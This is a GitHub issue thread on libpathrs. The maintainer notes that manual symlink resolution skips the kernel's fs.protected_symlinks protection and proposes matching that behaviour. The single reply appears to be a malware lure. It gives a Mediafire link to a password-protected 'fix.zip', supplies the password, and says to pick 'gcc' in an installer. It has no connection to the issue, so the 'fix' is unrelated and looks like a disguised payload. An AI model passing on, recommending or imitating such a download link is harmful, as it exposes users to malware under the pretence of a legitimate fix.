### ISSUE TITLE
handling unprivileged symlinks for opath resolver

### ISSUE THREAD

**Issue by cyphar** [openSUSE/libpathrs#58]
Because we resolve symlinks manually, we end up bypassing `fs.protected_symlinks` protections. This means that we could end up following symlinks that wouldn't be followed with a regular open. The scope of this problem is quite limited because we always restrict lookups to be inside the root (while usually attacks of this form are related to administrative tools opening symlinks without restrictions) but for consistency's sake we should probably implement this behaviour.

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
